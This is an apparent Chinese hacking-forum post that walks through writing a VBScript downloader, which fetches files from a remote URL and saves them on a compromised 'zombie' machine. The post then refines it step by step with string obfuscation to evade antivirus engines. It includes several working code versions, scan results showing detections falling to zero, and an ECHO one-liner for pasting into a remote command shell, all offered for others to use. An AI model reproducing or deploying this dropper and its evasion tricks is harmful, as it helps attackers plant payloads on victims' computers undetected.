以前一直用网上下载的DOWN.VBS，可能是用的人太多的原因吧，好长时间没有玩了，这次拿出来用的时候，尽然被 瑞星给挂了，所以自己花了几分钟时间，写了一个，原代码如下：

Set xml = CreateObject("Microsoft.XMLHTTP"):xml.Open "GET",http://www.qhwins.com/tools/tools.rar,False:xml.Send:with CreateObject("ADODB.Stream") :.type=1:.open:.write xml.responseBody:.savetofile "c:\wins.exe",2:end with:set xml=Nothing
写完后在线进行多种病毒软件的扫描查杀，结果如下：

文件 d1.vbs 接收于 2008.11.07 15:40:55 (CET)
当前状态: 正在读取 ... 队列中 等待中 扫描中 完成 未发现 停止

结果: 11/35 (31.43%)

依然有11个杀毒软件会查杀，再来

上面的脚本运行后会从URL中下载文件，并保存到肉机的C:\WINS.EXE，用起来还要改名，使用不太顺手，再改进一下
写成函数，一次可下载多个文件的
function GetHttpFile(url)
    FileName=LCase(mid(url,InStrRev(url, "/")+1))
Set xml = CreateObject("Microsoft.XMLHTTP")
xml.Open "GET",url,False
xml.Send
with CreateObject("ADODB.Stream")
.type=1
.open
.write xml.responseBody
.savetofile ".\"&FileName,2
end with
set xml=Nothing
end function
GetHttpFile("http://www.qhwins.com/tools/tools.rar")
GetHttpFile("http://www.qhwins.com/images/logo.jpg")

嗯，文件成功下载，且文件名也被保持，不错！
呵呵，再在线扫描一下，TNND，还有6款杀软会杀，包括KBSJ，KBSJ这方面确实挺强悍的，瑞星早就查不出来了，呵呵
不怕，我再变，下面再给出一个免杀改进版
function GetHttpFile(url)
    dim m,s
m="Microsoft.XMLHTTP"
s="ADODB.Stream"
    FileName=LCase(mid(url,InStrRev(url, "/")+1))
Set xml = CreateObject(m)
xml.Open "GET",url,False
xml.Send
with CreateObject(s)
.type=1
.open
.write xml.responseBody
.savetofile ".\"&FileName,2
end with
set xml=Nothing
end function
GetHttpFile("http://www.qhwins.com/tools/tools.rar")
GetHttpFile("http://www.qhwins.com/images/logo.jpg")

还有两款杀软放不过，不过对付市面上的杀软，已经是游刃有余了，再次变形，

function GetHttpFile(url)
    dim m,s
m="M_i_c_r_osoft.X_M_L_H_T_T_P"
s="A_D_O_D_B_._S_t_r_e_a_m"
    FileName=LCase(mid(url,InStrRev(url, "/")+1))
Set xml = CreateObject(m)
.......
end function
GetHttpFile(http://www.qhwins.com/tools/tools.rar)
GetHttpFile("http://www.qhwins.com/images/logo.jpg")

OK，在线扫描后发现逃过所有的杀毒软件，KBSJ也低头了，嘿嘿，爽，为了使用方便，我再给出一个ECHO版的，这样我们在CMDSHELL中直接粘，贴就可以使用了，方便
ECHO版的如下：

以下是引用片段： ECHO function GetHttpFile(url):dim m,s:m="M_i_c_r_osoft.X_M_L_H_T_T_P":s="A_D_O_D_B_._S_t_r_e_a_m":FileName=LCase(mid(url,InStrRev(url, "/")+1)):Set xml = CreateObject(replace(m,"_","")):xml.Open "GET",url,False:xml.Send:with CreateObject(replace(s,"_","")):.type=1:.open:.write xml.responseBody:.savetofile ".\"^&FileName,2:end with:set xml=Nothing:end function:GetHttpFile("http://www.qhwins.com/tools/tools.rar"):GetHttpFile("http://www.qhwins.com/images/logo.jpg")> DOWN.VBS

注意ECHO版的直接用记事本打开，没有任何换行，BS了所有的杀毒软件，OK，拿去玩吧！上面的脚本中，多个下载之间用":"分开就行了，一起可以下载N多个文件。

另外，网上还找到一个使用更方面的，不过逃不过杀软件的查杀，我直接给免我免杀过的吧[在线搜索发现瑞星还会查杀，但是其它杀软都不会有反应了，瑞星的免杀起来也很简单，我就不花时间了，大家自己搞定吧！]

以下是引用片段： URL = LCase(WScript.Arguments(0)) dim m,s m="M^i^c^r^o^s^o^f^t^.^X^M^L^H^T^T^P" s="A=D=O=DB=.=S=t=r=e=a=m" set cmd =Createobject(replace(m,"^","")) cmd.Open "GET",URL,0 cmd.Send() FileName=LCase(mid(URL,InStrRev(URL, "/")+1)) Set CsCriptGet = Createobject(replace(s,"=","")) CsCriptGet.Mode = 3 CsCriptGet.Type = 1 CsCriptGet.Open() CsCriptGet.Write(cmd.responseBody) CsCriptGet.SaveToFile FileName,2